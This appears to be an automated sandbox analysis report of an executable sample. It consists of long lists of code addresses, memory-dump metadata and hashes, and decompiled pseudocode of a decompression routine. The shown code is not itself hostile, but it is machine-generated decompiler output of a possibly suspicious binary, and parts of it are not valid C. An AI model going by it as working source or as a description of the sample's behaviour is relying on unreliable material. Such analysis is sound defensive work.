                                                                                    0x0040618c
                                                                                    0x0040618e
                                                                                    0x0040618e
                                                                                    0x0040618e
                                                                                    0x00406191
                                                                                    0x00406194
                                                                                    0x00406196
                                                                                    0x00406197
                                                                                    0x0040619a
                                                                                    0x00000000
                                                                                    0x0040619a
                                                                                    0x00000000
                                                                                    0x004063d0
                                                                                    0x004063d4
                                                                                    0x004063f2
                                                                                    0x004063f5
                                                                                    0x004063fc
                                                                                    0x004063ff
                                                                                    0x00406402
                                                                                    0x00406405
                                                                                    0x00406408
                                                                                    0x0040640b
                                                                                    0x0040640d
                                                                                    0x00406414
                                                                                    0x00406415
                                                                                    0x00406417
                                                                                    0x0040641a
                                                                                    0x0040641d
                                                                                    0x00406420
                                                                                    0x00406420
                                                                                    0x00406425
                                                                                    0x00000000
                                                                                    0x00406425
                                                                                    0x004063d6
                                                                                    0x004063d9
                                                                                    0x004063dc
                                                                                    0x004063e6
                                                                                    0x0040679d
                                                                                    0x0040679d
                                                                                    0x0040679d
                                                                                    0x00000000
                                                                                    0x0040679d
                                                                                    0x00000000
                                                                                    0x0040643a
                                                                                    0x0040643e
                                                                                    0x00406461
                                                                                    0x00406464
                                                                                    0x00406467
                                                                                    0x00406471
                                                                                    0x00406440
                                                                                    0x00406440
                                                                                    0x00406443
                                                                                    0x00406446
                                                                                    0x00406449
                                                                                    0x00406456
                                                                                    0x00406459
                                                                                    0x00406459
                                                                                    0x0040679d
                                                                                    0x0040679d
                                                                                    0x0040679d
                                                                                    0x00000000
                                                                                    0x0040679d
                                                                                    0x00000000
                                                                                    0x0040647d
                                                                                    0x00406481
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406487
                                                                                    0x0040648b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406491
                                                                                    0x00406493
                                                                                    0x00406497
                                                                                    0x00406497
                                                                                    0x0040649a
                                                                                    0x0040649e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406515
                                                                                    0x00406519
                                                                                    0x00406520
                                                                                    0x00406523
                                                                                    0x00406526
                                                                                    0x0040651b
                                                                                    0x0040651b
                                                                                    0x0040651b
                                                                                    0x00406529
                                                                                    0x0040652c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004065d5
                                                                                    0x004065d5
                                                                                    0x004065d9
                                                                                    0x00406977
                                                                                    0x00000000
                                                                                    0x00406977
                                                                                    0x004065df
                                                                                    0x004065e2
                                                                                    0x004065e5
                                                                                    0x004065e9
                                                                                    0x004065ec
                                                                                    0x004065f2
                                                                                    0x004065f4
                                                                                    0x004065f4
                                                                                    0x004065f4
                                                                                    0x004065f7
                                                                                    0x004065fa
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004061ca
                                                                                    0x004061ca
                                                                                    0x004061ce
                                                                                    0x0040693b
                                                                                    0x00000000
                                                                                    0x0040693b
                                                                                    0x004061d4
                                                                                    0x004061d7
                                                                                    0x004061da
                                                                                    0x004061de
                                                                                    0x004061e1
                                                                                    0x004061e7
                                                                                    0x004061e9
                                                                                    0x004061e9
                                                                                    0x004061e9
                                                                                    0x004061ec
                                                                                    0x004061ef
                                                                                    0x004061ef
                                                                                    0x004061f2
                                                                                    0x004061f5
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004061fb
                                                                                    0x00406201
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406207
                                                                                    0x00406207
                                                                                    0x0040620b
                                                                                    0x0040620e
                                                                                    0x00406211
                                                                                    0x00406214
                                                                                    0x00406217
                                                                                    0x00406218
                                                                                    0x0040621b
                                                                                    0x0040621d
                                                                                    0x00406223
                                                                                    0x00406226
                                                                                    0x00406229
                                                                                    0x0040622c
                                                                                    0x0040622f
                                                                                    0x00406232
                                                                                    0x00406235
                                                                                    0x00406251
                                                                                    0x00406254
                                                                                    0x00406257
                                                                                    0x0040625a
                                                                                    0x00406261
                                                                                    0x00406265
                                                                                    0x00406267
                                                                                    0x0040626b
                                                                                    0x00406237
                                                                                    0x00406237
                                                                                    0x0040623b
                                                                                    0x00406243
                                                                                    0x00406248
                                                                                    0x0040624a
                                                                                    0x0040624c
                                                                                    0x0040624c
                                                                                    0x0040626e
                                                                                    0x00406275
                                                                                    0x00406278
                                                                                    0x00000000
                                                                                    0x0040627e
                                                                                    0x00000000
                                                                                    0x0040627e
                                                                                    0x00000000
                                                                                    0x00406283
                                                                                    0x00406283
                                                                                    0x00406287
                                                                                    0x00406947
                                                                                    0x00000000
                                                                                    0x00406947
                                                                                    0x0040628d
                                                                                    0x00406290
                                                                                    0x00406293
                                                                                    0x00406297
                                                                                    0x0040629a
                                                                                    0x004062a0
                                                                                    0x004062a2
                                                                                    0x004062a2
                                                                                    0x004062a2
                                                                                    0x004062a5
                                                                                    0x004062a8
                                                                                    0x004062a8
                                                                                    0x004062a8
                                                                                    0x004062ae
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004062b0
                                                                                    0x004062b3
                                                                                    0x004062b6
                                                                                    0x004062b9
                                                                                    0x004062bc
                                                                                    0x004062bf
                                                                                    0x004062c2
                                                                                    0x004062c5
                                                                                    0x004062c8
                                                                                    0x004062cb
                                                                                    0x004062ce
                                                                                    0x004062e6
                                                                                    0x004062e9
                                                                                    0x004062ec
                                                                                    0x004062ef
                                                                                    0x004062ef
                                                                                    0x004062f2
                                                                                    0x004062f6
                                                                                    0x004062f8
                                                                                    0x004062d0
                                                                                    0x004062d0
                                                                                    0x004062d8
                                                                                    0x004062dd
                                                                                    0x004062df
                                                                                    0x004062e1
                                                                                    0x004062e1
                                                                                    0x004062fb
                                                                                    0x00406302
                                                                                    0x00406305
                                                                                    0x00000000
                                                                                    0x00406307
                                                                                    0x00000000
                                                                                    0x00406307
                                                                                    0x00406305
                                                                                    0x0040630c
                                                                                    0x0040630c
                                                                                    0x0040630c
                                                                                    0x0040630c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406347
                                                                                    0x00406347
                                                                                    0x0040634b
                                                                                    0x00406953
                                                                                    0x00000000
                                                                                    0x00406953
                                                                                    0x00406351
                                                                                    0x00406354
                                                                                    0x00406357
                                                                                    0x0040635b
                                                                                    0x0040635e
                                                                                    0x00406364
                                                                                    0x00406366
                                                                                    0x00406366
                                                                                    0x00406366
                                                                                    0x00406369
                                                                                    0x0040636c
                                                                                    0x0040636c
                                                                                    0x00406372
                                                                                    0x00406310
                                                                                    0x00406310
                                                                                    0x00406313
                                                                                    0x00000000
                                                                                    0x00406313
                                                                                    0x00406374
                                                                                    0x00406374
                                                                                    0x00406377
                                                                                    0x0040637a
                                                                                    0x0040637d
                                                                                    0x00406380
                                                                                    0x00406383
                                                                                    0x00406386
                                                                                    0x00406389
                                                                                    0x0040638c
                                                                                    0x0040638f
                                                                                    0x00406392
                                                                                    0x004063aa
                                                                                    0x004063ad
                                                                                    0x004063b0
                                                                                    0x004063b3
                                                                                    0x004063b3
                                                                                    0x004063b6
                                                                                    0x004063ba
                                                                                    0x004063bc
                                                                                    0x00406394
                                                                                    0x00406394
                                                                                    0x0040639c
                                                                                    0x004063a1
                                                                                    0x004063a3
                                                                                    0x004063a5
                                                                                    0x004063a5
                                                                                    0x004063bf
                                                                                    0x004063c6
                                                                                    0x004063c9
                                                                                    0x00000000
                                                                                    0x004063cb
                                                                                    0x00000000
                                                                                    0x004063cb
                                                                                    0x00000000
                                                                                    0x00406658
                                                                                    0x00406658
                                                                                    0x0040665c
                                                                                    0x00406983
                                                                                    0x00000000
                                                                                    0x00406983
                                                                                    0x00406662
                                                                                    0x00406665
                                                                                    0x00406668
                                                                                    0x0040666c
                                                                                    0x0040666f
                                                                                    0x00406675
                                                                                    0x00406677
                                                                                    0x00406677
                                                                                    0x00406677
                                                                                    0x0040667a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406767
                                                                                    0x0040676b
                                                                                    0x0040678d
                                                                                    0x00406790
                                                                                    0x0040679a
                                                                                    0x0040679d
                                                                                    0x0040679d
                                                                                    0x0040679d
                                                                                    0x00000000
                                                                                    0x0040679d
                                                                                    0x0040679d
                                                                                    0x0040676d
                                                                                    0x00406770
                                                                                    0x00406774
                                                                                    0x00406777
                                                                                    0x00406777
                                                                                    0x0040677a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406824
                                                                                    0x00406828
                                                                                    0x00406846
                                                                                    0x00406846
                                                                                    0x00406846
                                                                                    0x0040684d
                                                                                    0x00406854
                                                                                    0x0040685b
                                                                                    0x0040685b
                                                                                    0x00000000
                                                                                    0x0040685b
                                                                                    0x0040682a
                                                                                    0x0040682d
                                                                                    0x00406830
                                                                                    0x00406833
                                                                                    0x0040683a
                                                                                    0x0040677e
                                                                                    0x0040677e
                                                                                    0x00406781
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406915
                                                                                    0x00406918
                                                                                    0x00406819
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040654f
                                                                                    0x00406551
                                                                                    0x00406558
                                                                                    0x00406559
                                                                                    0x0040655b
                                                                                    0x0040655e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406566
                                                                                    0x00406569
                                                                                    0x0040656c
                                                                                    0x0040656e
                                                                                    0x00406570
                                                                                    0x00406570
                                                                                    0x00406571
                                                                                    0x00406574
                                                                                    0x0040657b
                                                                                    0x0040657e
                                                                                    0x0040658c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406862
                                                                                    0x00406862
                                                                                    0x00406865
                                                                                    0x0040686c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406871
                                                                                    0x00406871
                                                                                    0x00406875
                                                                                    0x004069ad
                                                                                    0x00000000
                                                                                    0x004069ad
                                                                                    0x0040687b
                                                                                    0x0040687e
                                                                                    0x00406881
                                                                                    0x00406885
                                                                                    0x00406888
                                                                                    0x0040688e
                                                                                    0x00406890
                                                                                    0x00406890
                                                                                    0x00406890
                                                                                    0x00406893
                                                                                    0x00406896
                                                                                    0x00406896
                                                                                    0x00406896
                                                                                    0x00406896
                                                                                    0x00406899
                                                                                    0x00406899
                                                                                    0x0040689d
                                                                                    0x004068fd
                                                                                    0x00406900
                                                                                    0x00406905
                                                                                    0x00406906
                                                                                    0x00406908
                                                                                    0x0040690a
                                                                                    0x0040690d
                                                                                    0x00406819
                                                                                    0x00406819
                                                                                    0x00000000
                                                                                    0x0040681f
                                                                                    0x00406819
                                                                                    0x0040689f
                                                                                    0x004068a5
                                                                                    0x004068a8
                                                                                    0x004068ab
                                                                                    0x004068ae
                                                                                    0x004068b1
                                                                                    0x004068b4
                                                                                    0x004068b7
                                                                                    0x004068ba
                                                                                    0x004068bd
                                                                                    0x004068c0
                                                                                    0x004068d9
                                                                                    0x004068dc
                                                                                    0x004068df
                                                                                    0x004068e2
                                                                                    0x004068e6
                                                                                    0x004068e8
                                                                                    0x004068e8
                                                                                    0x004068e9
                                                                                    0x004068ec
                                                                                    0x004068c2
                                                                                    0x004068c2
                                                                                    0x004068ca
                                                                                    0x004068cf
                                                                                    0x004068d1
                                                                                    0x004068d4
                                                                                    0x004068d4
                                                                                    0x004068ef
                                                                                    0x004068f6
                                                                                    0x00000000
                                                                                    0x004068f8
                                                                                    0x00000000
                                                                                    0x004068f8
                                                                                    0x00000000
                                                                                    0x00406594
                                                                                    0x00406597
                                                                                    0x004065cd
                                                                                    0x004066fd
                                                                                    0x004066fd
                                                                                    0x004066fd
                                                                                    0x004066fd
                                                                                    0x00406700
                                                                                    0x00406700
                                                                                    0x00406703
                                                                                    0x00406705
                                                                                    0x0040698f
                                                                                    0x00000000
                                                                                    0x0040698f
                                                                                    0x0040670b
                                                                                    0x0040670e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406714
                                                                                    0x00406718
                                                                                    0x0040671b
                                                                                    0x0040671b
                                                                                    0x0040671b
                                                                                    0x00000000
                                                                                    0x0040671b
                                                                                    0x00406599
                                                                                    0x0040659b
                                                                                    0x0040659d
                                                                                    0x0040659f
                                                                                    0x004065a2
                                                                                    0x004065a3
                                                                                    0x004065a5
                                                                                    0x004065a7
                                                                                    0x004065aa
                                                                                    0x004065ad
                                                                                    0x004065c3
                                                                                    0x004065c8
                                                                                    0x00406600
                                                                                    0x00406600
                                                                                    0x00406604
                                                                                    0x00406630
                                                                                    0x00406632
                                                                                    0x00406639
                                                                                    0x0040663c
                                                                                    0x0040663f
                                                                                    0x0040663f
                                                                                    0x00406644
                                                                                    0x00406644
                                                                                    0x00406646
                                                                                    0x00406649
                                                                                    0x00406650
                                                                                    0x00406653
                                                                                    0x00406680
                                                                                    0x00406680
                                                                                    0x00406683
                                                                                    0x00406686
                                                                                    0x004066fa
                                                                                    0x004066fa
                                                                                    0x004066fa
                                                                                    0x00000000
                                                                                    0x004066fa
                                                                                    0x00406688
                                                                                    0x0040668e
                                                                                    0x00406691
                                                                                    0x00406694
                                                                                    0x00406697
                                                                                    0x0040669a
                                                                                    0x0040669d
                                                                                    0x004066a0
                                                                                    0x004066a3
                                                                                    0x004066a6
                                                                                    0x004066a9
                                                                                    0x004066c2
                                                                                    0x004066c4
                                                                                    0x004066c7
                                                                                    0x004066c8
                                                                                    0x004066cb
                                                                                    0x004066cd
                                                                                    0x004066d0
                                                                                    0x004066d2
                                                                                    0x004066d4
                                                                                    0x004066d7
                                                                                    0x004066d9
                                                                                    0x004066dc
                                                                                    0x004066e0
                                                                                    0x004066e2
                                                                                    0x004066e2
                                                                                    0x004066e3
                                                                                    0x004066e6
                                                                                    0x004066e9
                                                                                    0x004066ab
                                                                                    0x004066ab
                                                                                    0x004066b3
                                                                                    0x004066b8
                                                                                    0x004066ba
                                                                                    0x004066bd
                                                                                    0x004066bd
                                                                                    0x004066ec
                                                                                    0x004066f3
                                                                                    0x0040667d
                                                                                    0x0040667d
                                                                                    0x0040667d
                                                                                    0x0040667d
                                                                                    0x00000000
                                                                                    0x004066f5
                                                                                    0x00000000
                                                                                    0x004066f5
                                                                                    0x004066f3
                                                                                    0x00406606
                                                                                    0x00406609
                                                                                    0x0040660b
                                                                                    0x0040660e
                                                                                    0x00406611
                                                                                    0x00406614
                                                                                    0x00406616
                                                                                    0x00406619
                                                                                    0x0040661c
                                                                                    0x0040661c
                                                                                    0x0040661f
                                                                                    0x0040661f
                                                                                    0x00406622
                                                                                    0x00406629
                                                                                    0x004065fd
                                                                                    0x004065fd
                                                                                    0x004065fd
                                                                                    0x004065fd
                                                                                    0x00000000
                                                                                    0x0040662b
                                                                                    0x00000000
                                                                                    0x0040662b
                                                                                    0x00406629
                                                                                    0x004065af
                                                                                    0x004065b2
                                                                                    0x004065b4
                                                                                    0x004065b7
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406316
                                                                                    0x00406316
                                                                                    0x0040631a
                                                                                    0x0040695f
                                                                                    0x00000000
                                                                                    0x0040695f
                                                                                    0x00406320
                                                                                    0x00406323
                                                                                    0x00406326
                                                                                    0x00406329
                                                                                    0x0040632c
                                                                                    0x0040632f
                                                                                    0x00406332
                                                                                    0x00406334
                                                                                    0x00406337
                                                                                    0x0040633a
                                                                                    0x0040633d
                                                                                    0x0040633f
                                                                                    0x0040633f
                                                                                    0x0040633f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004064a1
                                                                                    0x004064a1
                                                                                    0x004064a5
                                                                                    0x0040696b
                                                                                    0x00000000
                                                                                    0x0040696b
                                                                                    0x004064ab
                                                                                    0x004064ae
                                                                                    0x004064b1
                                                                                    0x004064b4
                                                                                    0x004064b6
                                                                                    0x004064b6
                                                                                    0x004064b6
                                                                                    0x004064b9
                                                                                    0x004064bc
                                                                                    0x004064bf
                                                                                    0x004064c2
                                                                                    0x004064c5
                                                                                    0x004064c8
                                                                                    0x004064c9
                                                                                    0x004064cb
                                                                                    0x004064cb
                                                                                    0x004064cb
                                                                                    0x004064ce
                                                                                    0x004064d1
                                                                                    0x004064d4
                                                                                    0x004064d7
                                                                                    0x004064d7
                                                                                    0x004064d7
                                                                                    0x004064da
                                                                                    0x004064dc
                                                                                    0x004064dc
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040671e
                                                                                    0x0040671e
                                                                                    0x0040671e
                                                                                    0x00406722
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406728
                                                                                    0x0040672b
                                                                                    0x0040672e
                                                                                    0x00406731
                                                                                    0x00406733
                                                                                    0x00406733
                                                                                    0x00406733
                                                                                    0x00406736
                                                                                    0x00406739
                                                                                    0x0040673c
                                                                                    0x0040673f
                                                                                    0x00406742
                                                                                    0x00406745
                                                                                    0x00406746
                                                                                    0x00406748
                                                                                    0x00406748
                                                                                    0x00406748
                                                                                    0x0040674b
                                                                                    0x0040674e
                                                                                    0x00406751
                                                                                    0x00406754
                                                                                    0x00406757
                                                                                    0x0040675b
                                                                                    0x0040675d
                                                                                    0x00406760
                                                                                    0x00000000
                                                                                    0x00406762
                                                                                    0x004064df
                                                                                    0x004064df
                                                                                    0x00000000
                                                                                    0x004064df
                                                                                    0x00406760
                                                                                    0x00406995
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00405fc4
                                                                                    0x004069cc
                                                                                    0x004069cc
                                                                                    0x00000000
                                                                                    0x004069cc
                                                                                    0x00406819
                                                                                    0x004067a0
                                                                                    0x0040679d
                                                                                    0x00000000
                                                                                    0x004064f2

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.239137393.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.239121682.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239186619.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239200738.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239305698.0000000000422000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239326419.0000000000429000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239341604.000000000042C000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 55b1e8378e3b2d282ecc9e99db2cbf184c75cfe722202a43e2005f386b139382
                                                                                    • Instruction ID: 067b91939e33353516387f96afd3df60e22fb0a2a23546be1218d687de4ca84d
                                                                                    • Opcode Fuzzy Hash: 55b1e8378e3b2d282ecc9e99db2cbf184c75cfe722202a43e2005f386b139382
                                                                                    • Instruction Fuzzy Hash: 14715371E00229CFEF28CF98C844BADBBB1FB44305F15816AD816BB281C7799996DF54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040643A, Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 98%
                                                                                    			E0040643A() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004069D4))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
